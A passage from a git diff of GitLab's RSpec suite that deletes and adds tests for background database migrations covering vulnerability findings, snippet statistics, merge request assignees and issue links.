vulnerabilities.create!(vulnerability_base_params.merge(project_id: project_3.id)) - - allow(::Gitlab::BackgroundMigration::Logger).to receive_messages(info: true, error: true) - end - - describe '#perform' do - it 'sets `has_vulnerabilities` attribute of project_settings' do - expect { subject.perform(project_1.id, project_3.id) }.to change { project_settings.count }.from(1).to(2) - .and change { project_settings.where(has_vulnerabilities: true).count }.from(0).to(2) - end - - it 'writes info log message' do 
- subject.perform(project_1.id, project_3.id) - - expect(::Gitlab::BackgroundMigration::Logger).to have_received(:info).with(migrator: described_class.name, - message: 'Projects has been processed to populate `has_vulnerabilities` information', - count: 2) - end - - context 'when non-existing project_id is given' do - it 'populates only for the existing projects' do - expect { subject.perform(project_1.id, 0, project_3.id) }.to change { project_settings.count }.from(1).to(2) - .and change { project_settings.where(has_vulnerabilities: true).count }.from(0).to(2) - end - end - - context 'when an error happens' do - before do - allow(described_class::ProjectSetting).to receive(:upsert_for).and_raise('foo') - end - - it 'writes error log message' do - subject.perform(project_1.id, project_3.id) - - expect(::Gitlab::BackgroundMigration::Logger).to have_received(:error).with(migrator: described_class.name, - message: 'foo', - project_ids: [project_1.id, project_3.id]) - end - end - end -end diff --git a/spec/lib/gitlab/background_migration/populate_merge_request_assignees_table_spec.rb b/spec/lib/gitlab/background_migration/populate_merge_request_assignees_table_spec.rb deleted file mode 100644 index 1d8eed53553..00000000000 --- a/spec/lib/gitlab/background_migration/populate_merge_request_assignees_table_spec.rb +++ /dev/null @@ -1,70 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulateMergeRequestAssigneesTable, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:users) { table(:users) } - - let(:user) { users.create!(email: 'test@example.com', projects_limit: 100, username: 'test') } - let(:user_2) { users.create!(email: 'test2@example.com', projects_limit: 100, username: 'test') } - let(:user_3) { users.create!(email: 'test3@example.com', projects_limit: 100, username: 'test') } - - let(:namespace) { namespaces.create!(name: 'gitlab', path: 
'gitlab-org') } - let(:project) { projects.create!(namespace_id: namespace.id, name: 'foo') } - let(:merge_requests) { table(:merge_requests) } - let(:merge_request_assignees) { table(:merge_request_assignees) } - - def create_merge_request(id, params = {}) - params.merge!(id: id, - target_project_id: project.id, - target_branch: 'master', - source_project_id: project.id, - source_branch: 'mr name', - title: "mr name#{id}") - - merge_requests.create!(params) - end - - before do - create_merge_request(2, assignee_id: user.id) - create_merge_request(3, assignee_id: user_2.id) - create_merge_request(4, assignee_id: user_3.id) - - # Test filtering MRs without assignees - create_merge_request(5, assignee_id: nil) - # Test filtering already migrated row - merge_request_assignees.create!(merge_request_id: 2, user_id: user_3.id) - end - - describe '#perform' do - it 'creates merge_request_assignees rows according to merge_requests' do - subject.perform(1, 4) - - rows = merge_request_assignees.order(:id).map { |row| row.attributes.slice('merge_request_id', 'user_id') } - existing_rows = [ - { 'merge_request_id' => 2, 'user_id' => user_3.id } - ] - created_rows = [ - { 'merge_request_id' => 3, 'user_id' => user_2.id }, - { 'merge_request_id' => 4, 'user_id' => user_3.id } - ] - expected_rows = existing_rows + created_rows - - expect(rows.size).to eq(expected_rows.size) - expected_rows.each do |expected_row| - expect(rows).to include(expected_row) - end - end - end - - describe '#perform_all_sync' do - it 'executes peform for all merge requests in batches' do - expect(subject).to receive(:perform).with(2, 4).ordered - expect(subject).to receive(:perform).with(5, 5).ordered - - subject.perform_all_sync(batch_size: 3) - end - end -end diff --git a/spec/lib/gitlab/background_migration/populate_missing_vulnerability_dismissal_information_spec.rb b/spec/lib/gitlab/background_migration/populate_missing_vulnerability_dismissal_information_spec.rb deleted file mode 100644 index 
1c987d3876f..00000000000 --- a/spec/lib/gitlab/background_migration/populate_missing_vulnerability_dismissal_information_spec.rb +++ /dev/null @@ -1,65 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulateMissingVulnerabilityDismissalInformation, schema: 20181228175414 do - let(:users) { table(:users) } - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:vulnerabilities) { table(:vulnerabilities) } - let(:findings) { table(:vulnerability_occurrences) } - let(:scanners) { table(:vulnerability_scanners) } - let(:identifiers) { table(:vulnerability_identifiers) } - let(:feedback) { table(:vulnerability_feedback) } - - let(:user) { users.create!(name: 'test', email: 'test@example.com', projects_limit: 5) } - let(:namespace) { namespaces.create!(name: 'gitlab', path: 'gitlab-org') } - let(:project) { projects.create!(namespace_id: namespace.id, name: 'foo') } - let(:vulnerability_1) { vulnerabilities.create!(title: 'title', state: 2, severity: 0, confidence: 5, report_type: 2, project_id: project.id, author_id: user.id) } - let(:vulnerability_2) { vulnerabilities.create!(title: 'title', state: 2, severity: 0, confidence: 5, report_type: 2, project_id: project.id, author_id: user.id) } - let(:scanner) { scanners.create!(project_id: project.id, external_id: 'foo', name: 'bar') } - let(:identifier) { identifiers.create!(project_id: project.id, fingerprint: 'foo', external_type: 'bar', external_id: 'zoo', name: 'identifier') } - - before do - feedback.create!(feedback_type: 0, - category: 'sast', - project_fingerprint: '418291a26024a1445b23fe64de9380cdcdfd1fa8', - project_id: project.id, - author_id: user.id, - created_at: Time.current) - - findings.create!(name: 'Finding', - report_type: 'sast', - project_fingerprint: Gitlab::Database::ShaAttribute.new.serialize('418291a26024a1445b23fe64de9380cdcdfd1fa8'), - location_fingerprint: 'bar', - severity: 1, - confidence: 1, - 
metadata_version: 1, - raw_metadata: '', - uuid: SecureRandom.uuid, - project_id: project.id, - vulnerability_id: vulnerability_1.id, - scanner_id: scanner.id, - primary_identifier_id: identifier.id) - - allow(::Gitlab::BackgroundMigration::Logger).to receive_messages(info: true, warn: true, error: true) - end - - describe '#perform' do - it 'updates the missing dismissal information of the vulnerability' do - expect { subject.perform(vulnerability_1.id, vulnerability_2.id) }.to change { vulnerability_1.reload.dismissed_at }.from(nil) - .and change { vulnerability_1.reload.dismissed_by_id }.from(nil).to(user.id) - end - - it 'writes log messages' do - subject.perform(vulnerability_1.id, vulnerability_2.id) - - expect(::Gitlab::BackgroundMigration::Logger).to have_received(:info).with(migrator: described_class.name, - message: 'Dismissal information has been copied', - count: 2) - expect(::Gitlab::BackgroundMigration::Logger).to have_received(:warn).with(migrator: described_class.name, - message: 'Could not update vulnerability!', - vulnerability_id: vulnerability_2.id) - end - end -end diff --git a/spec/lib/gitlab/background_migration/populate_personal_snippet_statistics_spec.rb b/spec/lib/gitlab/background_migration/populate_personal_snippet_statistics_spec.rb deleted file mode 100644 index f9628849dbf..00000000000 --- a/spec/lib/gitlab/background_migration/populate_personal_snippet_statistics_spec.rb +++ /dev/null @@ -1,141 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulatePersonalSnippetStatistics do - let(:file_name) { 'file_name.rb' } - let(:content) { 'content' } - let(:snippets) { table(:snippets) } - let(:snippet_repositories) { table(:snippet_repositories) } - let(:users) { table(:users) } - let(:namespaces) { table(:namespaces) } - let(:snippet_statistics) { table(:snippet_statistics) } - let(:namespace_statistics) { table(:namespace_root_storage_statistics) } - let(:routes) { 
table(:routes) } - let(:repo_size) { 123456 } - let(:expected_repo_size) { repo_size.megabytes } - - let(:user1) { users.create!(id: 1, email: 'test@example.com', projects_limit: 100, username: 'test1') } - let(:user2) { users.create!(id: 2, email: 'test2@example.com', projects_limit: 100, username: 'test2') } - let!(:user1_namespace) { namespaces.create!(id: 1, name: 'user1', path: 'user1', owner_id: user1.id) } - let!(:user2_namespace) { namespaces.create!(id: 2, name: 'user2', path: 'user2', owner_id: user2.id) } - let(:user1_namespace_statistics) { namespace_statistics.find_by(namespace_id: user1_namespace.id) } - let(:user2_namespace_statistics) { namespace_statistics.find_by(namespace_id: user2_namespace.id) } - - let(:ids) { snippets.pluck(:id) } - let(:migration) { described_class.new } - - subject do - migration.perform(ids) - end - - before do - allow_any_instance_of(Repository).to receive(:size).and_return(repo_size) - end - - after do - snippets.all.each { |s| raw_repository(s).remove } - end - - context 'with existing personal snippets' do - let!(:snippet1) { create_snippet(1, user1) } - let!(:snippet2) { create_snippet(2, user1) } - let!(:snippet3) { create_snippet(3, user2) } - let!(:snippet4) { create_snippet(4, user2) } - - before do - create_snippet_statistics(2, 0) - create_snippet_statistics(4, 123) - end - - it 'creates/updates all snippet_statistics' do - expect { subject }.to change { snippet_statistics.count }.from(2).to(4) - - expect(snippet_statistics.pluck(:repository_size)).to be_all(expected_repo_size) - end - - it 'creates/updates the associated namespace statistics' do - expect(migration).to receive(:update_namespace_statistics).twice.and_call_original - - subject - - stats = snippet_statistics.where(snippet_id: [snippet1, snippet2]).sum(:repository_size) - expect(user1_namespace_statistics.snippets_size).to eq stats - - stats = snippet_statistics.where(snippet_id: [snippet3, snippet4]).sum(:repository_size) - 
expect(user2_namespace_statistics.snippets_size).to eq stats - end - - context 'when an error is raised when updating a namespace statistics' do - it 'logs the error and continue execution' do - expect_next_instance_of(Namespaces::StatisticsRefresherService) do |instance| - expect(instance).to receive(:execute).with(Namespace.find(user1_namespace.id)).and_raise('Error') - end - - expect_next_instance_of(Namespaces::StatisticsRefresherService) do |instance| - expect(instance).to receive(:execute).and_call_original - end - - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |instance| - expect(instance).to receive(:error).with(message: /Error updating statistics for namespace/).once - end - - subject - - expect(user1_namespace_statistics).to be_nil - - stats = snippet_statistics.where(snippet_id: [snippet3, snippet4]).sum(:repository_size) - expect(user2_namespace_statistics.snippets_size).to eq stats - end - end - end - - context 'when a snippet repository is empty' do - let!(:snippet1) { create_snippet(1, user1, with_repo: false) } - let!(:snippet2) { create_snippet(2, user1) } - - it 'logs error and continues execution' do - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |instance| - expect(instance).to receive(:error).with(message: /Invalid snippet repository/).once - end - - subject - - expect(snippet_statistics.find_by(snippet_id: snippet1.id)).to be_nil - expect(user1_namespace_statistics.snippets_size).to eq expected_repo_size - end - end - - def create_snippet(id, author, with_repo: true) - snippets.create!(id: id, type: 'PersonalSnippet', author_id: author.id, file_name: file_name, content: content).tap do |snippet| - if with_repo - allow(snippet).to receive(:disk_path).and_return(disk_path(snippet)) - - raw_repository(snippet).create_repository - - TestEnv.copy_repo(snippet, - bare_repo: TestEnv.factory_repo_path_bare, - refs: TestEnv::BRANCH_SHA) - end - end - end - - def create_snippet_statistics(snippet_id, repository_size 
= 0) - snippet_statistics.create!(snippet_id: snippet_id, repository_size: repository_size) - end - - def raw_repository(snippet) - Gitlab::Git::Repository.new('default', - "#{disk_path(snippet)}.git", - Gitlab::GlRepository::SNIPPET.identifier_for_container(snippet), - "@snippets/#{snippet.id}") - end - - def hashed_repository(snippet) - Storage::Hashed.new(snippet, prefix: '@snippets') - end - - def disk_path(snippet) - hashed_repository(snippet).disk_path - end -end diff --git a/spec/lib/gitlab/background_migration/populate_project_snippet_statistics_spec.rb b/spec/lib/gitlab/background_migration/populate_project_snippet_statistics_spec.rb deleted file mode 100644 index 7884e0d97c0..00000000000 --- a/spec/lib/gitlab/background_migration/populate_project_snippet_statistics_spec.rb +++ /dev/null @@ -1,224 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulateProjectSnippetStatistics do - let(:file_name) { 'file_name.rb' } - let(:content) { 'content' } - let(:snippets) { table(:snippets) } - let(:snippet_repositories) { table(:snippet_repositories) } - let(:users) { table(:users) } - let(:namespaces) { table(:namespaces) } - let(:snippet_statistics) { table(:snippet_statistics) } - let(:project_statistics) { table(:project_statistics) } - let(:projects) { table(:projects) } - let(:namespace_statistics) { table(:namespace_root_storage_statistics) } - let(:routes) { table(:routes) } - let(:repo_size) { 123456 } - let(:expected_repo_size) { repo_size.megabytes } - - let(:user) { users.create!(id: 1, email: 'test@example.com', projects_limit: 100, username: 'test') } - let(:group) { namespaces.create!(id: 10, type: 'Group', name: 'group1', path: 'group1') } - let(:user_namespace) { namespaces.create!(id: 20, name: 'user', path: 'user', owner_id: user.id) } - - let(:project1) { create_project(1, 'test', group) } - let(:project2) { create_project(2, 'test1', user_namespace) } - let(:project3) { 
create_project(3, 'test2', group) } - - let!(:project_stats1) { create_project_statistics(project1) } - let!(:project_stats2) { create_project_statistics(project2) } - let!(:project_stats3) { create_project_statistics(project3) } - - let(:ids) { snippets.pluck(:id) } - let(:migration) { described_class.new } - - subject do - migration.perform(ids) - - project_stats1.reload if project_stats1.persisted? - project_stats2.reload if project_stats2.persisted? - project_stats3.reload if project_stats3.persisted? - end - - before do - allow_any_instance_of(Repository).to receive(:size).and_return(repo_size) - end - - after do - snippets.all.each { |s| raw_repository(s).remove } - end - - context 'with existing user and group snippets' do - let!(:snippet1) { create_snippet(1, project1) } - let!(:snippet2) { create_snippet(2, project1) } - let!(:snippet3) { create_snippet(3, project2) } - let!(:snippet4) { create_snippet(4, project2) } - let!(:snippet5) { create_snippet(5, project3) } - - before do - create_snippet_statistics(2, 0) - create_snippet_statistics(4, 123) - end - - it 'creates/updates all snippet_statistics' do - expect(snippet_statistics.count).to eq 2 - - subject - - expect(snippet_statistics.count).to eq 5 - - snippet_statistics.all.each do |stat| - expect(stat.repository_size).to eq expected_repo_size - end - end - - it 'updates associated snippet project statistics' do - expect(project_stats1.snippets_size).to be_nil - expect(project_stats2.snippets_size).to be_nil - - subject - - snippets_size = snippet_statistics.where(snippet_id: [snippet1.id, snippet2.id]).sum(:repository_size) - expect(project_stats1.snippets_size).to eq snippets_size - - snippets_size = snippet_statistics.where(snippet_id: [snippet3.id, snippet4.id]).sum(:repository_size) - expect(project_stats2.snippets_size).to eq snippets_size - - snippets_size = snippet_statistics.where(snippet_id: snippet5.id).sum(:repository_size) - expect(project_stats3.snippets_size).to eq snippets_size - end - 
- it 'forces the project statistics refresh' do - expect(migration).to receive(:update_project_statistics).exactly(3).times - - subject - end - - it 'creates/updates the associated namespace statistics' do - expect(migration).to receive(:update_namespace_statistics).twice.and_call_original - - subject - - expect(namespace_statistics.find_by(namespace_id: group.id).snippets_size).to eq project_stats1.snippets_size + project_stats3.snippets_size - expect(namespace_statistics.find_by(namespace_id: user_namespace.id).snippets_size).to eq project_stats2.snippets_size - end - - context 'when the project statistics does not exists' do - it 'does not raise any error' do - project_stats3.delete - - subject - - expect(namespace_statistics.find_by(namespace_id: group.id).snippets_size).to eq project_stats1.snippets_size - expect(namespace_statistics.find_by(namespace_id: user_namespace.id).snippets_size).to eq project_stats2.snippets_size - end - end - - context 'when an error is raised when updating a project statistics' do - it 'logs the error and continue execution' do - expect(migration).to receive(:update_project_statistics).with(Project.find(project1.id)).and_raise('Error') - expect(migration).to receive(:update_project_statistics).with(Project.find(project2.id)).and_call_original - expect(migration).to receive(:update_project_statistics).with(Project.find(project3.id)).and_call_original - - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |instance| - expect(instance).to receive(:error).with(message: /Error updating statistics for project #{project1.id}/).once - end - - subject - - expect(project_stats2.snippets_size).not_to be_nil - expect(project_stats3.snippets_size).not_to be_nil - end - end - - context 'when an error is raised when updating a namespace statistics' do - it 'logs the error and continue execution' do - expect(migration).to receive(:update_namespace_statistics).with(Group.find(group.id)).and_raise('Error') - expect(migration).to 
receive(:update_namespace_statistics).with(Namespace.find(user_namespace.id)).and_call_original - - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |instance| - expect(instance).to receive(:error).with(message: /Error updating statistics for namespace/).once - end - - subject - - expect(namespace_statistics.find_by(namespace_id: user_namespace.id).snippets_size).to eq project_stats2.snippets_size - end - end - end - - context 'when project snippet is in a subgroup' do - let(:subgroup) { namespaces.create!(id: 30, type: 'Group', name: 'subgroup', path: 'subgroup', parent_id: group.id) } - let(:project1) { create_project(1, 'test', subgroup, "#{group.path}/#{subgroup.path}/test") } - let!(:snippet1) { create_snippet(1, project1) } - - it 'updates the root namespace statistics' do - subject - - expect(snippet_statistics.count).to eq 1 - expect(project_stats1.snippets_size).to eq snippet_statistics.first.repository_size - expect(namespace_statistics.find_by(namespace_id: subgroup.id)).to be_nil - expect(namespace_statistics.find_by(namespace_id: group.id).snippets_size).to eq project_stats1.snippets_size - end - end - - context 'when a snippet repository is empty' do - let!(:snippet1) { create_snippet(1, project1, with_repo: false) } - let!(:snippet2) { create_snippet(2, project1) } - - it 'logs error and continues execution' do - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |instance| - expect(instance).to receive(:error).with(message: /Invalid snippet repository/).once - end - - subject - - expect(snippet_statistics.find_by(snippet_id: snippet1.id)).to be_nil - expect(project_stats1.snippets_size).to eq snippet_statistics.find(snippet2.id).repository_size - end - end - - def create_snippet(id, project, with_repo: true) - snippets.create!(id: id, type: 'ProjectSnippet', project_id: project.id, author_id: user.id, file_name: file_name, content: content).tap do |snippet| - if with_repo - allow(snippet).to 
receive(:disk_path).and_return(disk_path(snippet)) - - raw_repository(snippet).create_repository - - TestEnv.copy_repo(snippet, - bare_repo: TestEnv.factory_repo_path_bare, - refs: TestEnv::BRANCH_SHA) - end - end - end - - def create_project(id, name, namespace, path = nil) - projects.create!(id: id, name: name, path: name.downcase.gsub(/\s/, '_'), namespace_id: namespace.id).tap do |project| - path ||= "#{namespace.path}/#{project.path}" - routes.create!(id: id, source_type: 'Project', source_id: project.id, path: path) - end - end - - def create_snippet_statistics(snippet_id, repository_size = 0) - snippet_statistics.create!(snippet_id: snippet_id, repository_size: repository_size) - end - - def create_project_statistics(project, snippets_size = nil) - project_statistics.create!(id: project.id, project_id: project.id, namespace_id: project.namespace_id, snippets_size: snippets_size) - end - - def raw_repository(snippet) - Gitlab::Git::Repository.new('default', - "#{disk_path(snippet)}.git", - Gitlab::GlRepository::SNIPPET.identifier_for_container(snippet), - "@snippets/#{snippet.id}") - end - - def hashed_repository(snippet) - Storage::Hashed.new(snippet, prefix: '@snippets') - end - - def disk_path(snippet) - hashed_repository(snippet).disk_path - end -end diff --git a/spec/lib/gitlab/background_migration/recalculate_project_authorizations_with_min_max_user_id_spec.rb b/spec/lib/gitlab/background_migration/recalculate_project_authorizations_with_min_max_user_id_spec.rb deleted file mode 100644 index 1830a7fc099..00000000000 --- a/spec/lib/gitlab/background_migration/recalculate_project_authorizations_with_min_max_user_id_spec.rb +++ /dev/null @@ -1,38 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::RecalculateProjectAuthorizationsWithMinMaxUserId, schema: 20181228175414 do - let(:users_table) { table(:users) } - let(:min) { 1 } - let(:max) { 5 } - - before do - min.upto(max) do |i| - 
users_table.create!(id: i, email: "user#{i}@example.com", projects_limit: 10) - end - end - - describe '#perform' do - it 'initializes Users::RefreshAuthorizedProjectsService with correct users' do - min.upto(max) do |i| - user = User.find(i) - expect(Users::RefreshAuthorizedProjectsService).to( - receive(:new).with(user, any_args).and_call_original) - end - - described_class.new.perform(min, max) - end - - it 'executes Users::RefreshAuthorizedProjectsService' do - expected_call_counts = max - min + 1 - - service = instance_double(Users::RefreshAuthorizedProjectsService) - expect(Users::RefreshAuthorizedProjectsService).to( - receive(:new).exactly(expected_call_counts).times.and_return(service)) - expect(service).to receive(:execute).exactly(expected_call_counts).times - - described_class.new.perform(min, max) - end - end -end diff --git a/spec/lib/gitlab/background_migration/remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb b/spec/lib/gitlab/background_migration/remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb new file mode 100644 index 00000000000..28aa9efde4f --- /dev/null +++ b/spec/lib/gitlab/background_migration/remove_occurrence_pipelines_and_duplicate_vulnerabilities_findings_spec.rb @@ -0,0 +1,175 @@ +# frozen_string_literal: true +require 'spec_helper' + +RSpec.describe Gitlab::BackgroundMigration::RemoveOccurrencePipelinesAndDuplicateVulnerabilitiesFindings do + let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user') } + let(:users) { table(:users) } + let(:user) { create_user! 
} + let(:project) { table(:projects).create!(id: 14219619, namespace_id: namespace.id) } + let(:scanners) { table(:vulnerability_scanners) } + let!(:scanner1) { scanners.create!(project_id: project.id, external_id: 'test 1', name: 'test scanner 1') } + let!(:scanner2) { scanners.create!(project_id: project.id, external_id: 'test 2', name: 'test scanner 2') } + let!(:scanner3) { scanners.create!(project_id: project.id, external_id: 'test 3', name: 'test scanner 3') } + let!(:unrelated_scanner) { scanners.create!(project_id: project.id, external_id: 'unreleated_scanner', name: 'unrelated scanner') } + let(:vulnerabilities) { table(:vulnerabilities) } + let(:vulnerability_findings) { table(:vulnerability_occurrences) } + let(:vulnerability_finding_pipelines) { table(:vulnerability_occurrence_pipelines) } + let(:vulnerability_identifiers) { table(:vulnerability_identifiers) } + let(:vulnerability_identifier) do + vulnerability_identifiers.create!( + id: 1244459, + project_id: project.id, + external_type: 'vulnerability-identifier', + external_id: 'vulnerability-identifier', + fingerprint: '0a203e8cd5260a1948edbedc76c7cb91ad6a2e45', + name: 'vulnerability identifier') + end + + let!(:vulnerability_for_first_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let!(:first_finding_duplicate) do + create_finding!( + id: 5606961, + uuid: "bd95c085-71aa-51d7-9bb6-08ae669c262e", + vulnerability_id: vulnerability_for_first_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner1.id, + project_id: project.id + ) + end + + let!(:vulnerability_for_second_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let!(:second_finding_duplicate) do + create_finding!( + id: 8765432, + uuid: "5b714f58-1176-5b26-8fd5-e11dfcb031b5", + vulnerability_id: 
vulnerability_for_second_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner2.id, + project_id: project.id + ) + end + + let!(:vulnerability_for_third_duplicate) do + create_vulnerability!( + project_id: project.id, + author_id: user.id + ) + end + + let!(:third_finding_duplicate) do + create_finding!( + id: 8832995, + uuid: "cfe435fa-b25b-5199-a56d-7b007cc9e2d4", + vulnerability_id: vulnerability_for_third_duplicate.id, + report_type: 0, + location_fingerprint: '00049d5119c2cb3bfb3d1ee1f6e031fe925aed75', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: scanner3.id, + project_id: project.id + ) + end + + let!(:unrelated_finding) do + create_finding!( + id: 9999999, + uuid: "unreleated_finding", + vulnerability_id: nil, + report_type: 1, + location_fingerprint: 'random_location_fingerprint', + primary_identifier_id: vulnerability_identifier.id, + scanner_id: unrelated_scanner.id, + project_id: project.id + ) + end + + subject { described_class.new.perform(first_finding_duplicate.id, unrelated_finding.id) } + + before do + 4.times do + create_finding_pipeline!(project_id: project.id, finding_id: first_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: second_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: third_finding_duplicate.id) + create_finding_pipeline!(project_id: project.id, finding_id: unrelated_finding.id) + end + end + + it 'removes Vulnerabilities::OccurrencePipelines for matching Vulnerabilities::Finding' do + expect(vulnerability_findings.count).to eq(4) + expect(vulnerability_finding_pipelines.count).to eq(16) + + expect { subject }.to change(vulnerability_finding_pipelines, :count).from(16).to(8) + .and change(vulnerability_findings, :count).from(4).to(2) + end + + private + + def create_vulnerability!(project_id:, author_id:, title: 'test', 
severity: 7, confidence: 7, report_type: 0) + vulnerabilities.create!( + project_id: project_id, + author_id: author_id, + title: title, + severity: severity, + confidence: confidence, + report_type: report_type + ) + end + + # rubocop:disable Metrics/ParameterLists + def create_finding!( + id: nil, + vulnerability_id:, project_id:, scanner_id:, primary_identifier_id:, + name: "test", severity: 7, confidence: 7, report_type: 0, + project_fingerprint: '123qweasdzxc', location_fingerprint: 'test', + metadata_version: 'test', raw_metadata: 'test', uuid: 'test') + params = { + vulnerability_id: vulnerability_id, + project_id: project_id, + name: name, + severity: severity, + confidence: confidence, + report_type: report_type, + project_fingerprint: project_fingerprint, + scanner_id: scanner_id, + primary_identifier_id: vulnerability_identifier.id, + location_fingerprint: location_fingerprint, + metadata_version: metadata_version, + raw_metadata: raw_metadata, + uuid: uuid + } + params[:id] = id unless id.nil? 
+ vulnerability_findings.create!(params) + end + # rubocop:enable Metrics/ParameterLists + + def create_user!(name: "Example User", email: "user@example.com", user_type: nil, created_at: Time.zone.now, confirmed_at: Time.zone.now) + table(:users).create!( + name: name, + email: email, + username: name, + projects_limit: 0, + user_type: user_type, + confirmed_at: confirmed_at + ) + end + + def create_finding_pipeline!(project_id:, finding_id:) + pipeline = table(:ci_pipelines).create!(project_id: project_id) + vulnerability_finding_pipelines.create!(pipeline_id: pipeline.id, occurrence_id: finding_id) + end +end diff --git a/spec/lib/gitlab/background_migration/remove_vulnerability_finding_links_spec.rb b/spec/lib/gitlab/background_migration/remove_vulnerability_finding_links_spec.rb new file mode 100644 index 00000000000..fadee64886f --- /dev/null +++ b/spec/lib/gitlab/background_migration/remove_vulnerability_finding_links_spec.rb @@ -0,0 +1,66 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::BackgroundMigration::RemoveVulnerabilityFindingLinks, :migration, schema: 20211104165220 do + let(:vulnerability_findings) { table(:vulnerability_occurrences) } + let(:finding_links) { table(:vulnerability_finding_links) } + + let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user', type: Namespaces::UserNamespace.sti_name) } + let(:project) { table(:projects).create!(namespace_id: namespace.id) } + let(:scanner) { table(:vulnerability_scanners).create!(project_id: project.id, external_id: 'scanner', name: 'scanner') } + let(:vulnerability_identifier) do + table(:vulnerability_identifiers).create!( + project_id: project.id, + external_type: 'vulnerability-identifier', + external_id: 'vulnerability-identifier', + fingerprint: '7e394d1b1eb461a7406d7b1e08f057a1cf11287a', + name: 'vulnerability identifier') + end + + # vulnerability findings + let!(:findings) do + Array.new(2) do |id| + vulnerability_findings.create!( + 
project_id: project.id, + name: 'Vulnerability Name', + severity: 7, + confidence: 7, + report_type: 0, + project_fingerprint: '123qweasdzxc', + scanner_id: scanner.id, + primary_identifier_id: vulnerability_identifier.id, + location_fingerprint: "location_fingerprint_#{id}", + metadata_version: 'metadata_version', + raw_metadata: 'raw_metadata', + uuid: "uuid_#{id}" + ) + end + end + + # vulnerability finding links + let!(:links) do + { + findings.first => Array.new(5) { |id| finding_links.create!(vulnerability_occurrence_id: findings.first.id, name: "Link Name 1", url: "link_url1.example") }, + findings.second => Array.new(5) { |id| finding_links.create!(vulnerability_occurrence_id: findings.second.id, name: "Link Name 2", url: "link_url2.example") } + } + end + + it 'removes vulnerability links' do + expect do + subject.perform(links[findings.first].first.id, links[findings.second].last.id) + end.to change { finding_links.count }.from(10).to(0) + + expect(finding_links.all).to be_empty + end + + it 'only deletes vulnerability links for the current batch' do + expected_links = [finding_links.where(vulnerability_occurrence_id: findings.second.id)].flatten + + expect do + subject.perform(links[findings.first].first.id, links[findings.first].last.id) + end.to change { finding_links.count }.from(10).to(5) + + expect(finding_links.all).to match_array(expected_links) + end +end diff --git a/spec/lib/gitlab/background_migration/replace_blocked_by_links_spec.rb b/spec/lib/gitlab/background_migration/replace_blocked_by_links_spec.rb deleted file mode 100644 index 6cfdbb5a14e..00000000000 --- a/spec/lib/gitlab/background_migration/replace_blocked_by_links_spec.rb +++ /dev/null @@ -1,42 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::ReplaceBlockedByLinks, schema: 20181228175414 do - let(:namespace) { table(:namespaces).create!(name: 'gitlab', path: 'gitlab-org') } - let(:project) { 
table(:projects).create!(namespace_id: namespace.id, name: 'gitlab') } - let(:issue1) { table(:issues).create!(project_id: project.id, title: 'a') } - let(:issue2) { table(:issues).create!(project_id: project.id, title: 'b') } - let(:issue3) { table(:issues).create!(project_id: project.id, title: 'c') } - let(:issue_links) { table(:issue_links) } - let!(:blocked_link1) { issue_links.create!(source_id: issue2.id, target_id: issue1.id, link_type: 2) } - let!(:opposite_link1) { issue_links.create!(source_id: issue1.id, target_id: issue2.id, link_type: 1) } - let!(:blocked_link2) { issue_links.create!(source_id: issue1.id, target_id: issue3.id, link_type: 2) } - let!(:opposite_link2) { issue_links.create!(source_id: issue3.id, target_id: issue1.id, link_type: 0) } - let!(:nochange_link) { issue_links.create!(source_id: issue2.id, target_id: issue3.id, link_type: 1) } - - subject { described_class.new.perform(issue_links.minimum(:id), issue_links.maximum(:id)) } - - it 'deletes any opposite relations' do - subject - - expect(issue_links.ids).to match_array([nochange_link.id, blocked_link1.id, blocked_link2.id]) - end - - it 'ignores issue links other than blocked_by' do - subject - - expect(nochange_link.reload.link_type).to eq(1) - end - - it 'updates blocked_by issue links' do - subject - - expect(blocked_link1.reload.link_type).to eq(1) - expect(blocked_link1.source_id).to eq(issue1.id) - expect(blocked_link1.target_id).to eq(issue2.id) - expect(blocked_link2.reload.link_type).to eq(1) - expect(blocked_link2.source_id).to eq(issue3.id) - expect(blocked_link2.target_id).to eq(issue1.id) - end -end diff --git a/spec/lib/gitlab/background_migration/reset_merge_status_spec.rb b/spec/lib/gitlab/background_migration/reset_merge_status_spec.rb deleted file mode 100644 index 2f5074649c4..00000000000 --- a/spec/lib/gitlab/background_migration/reset_merge_status_spec.rb +++ /dev/null @@ -1,48 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 
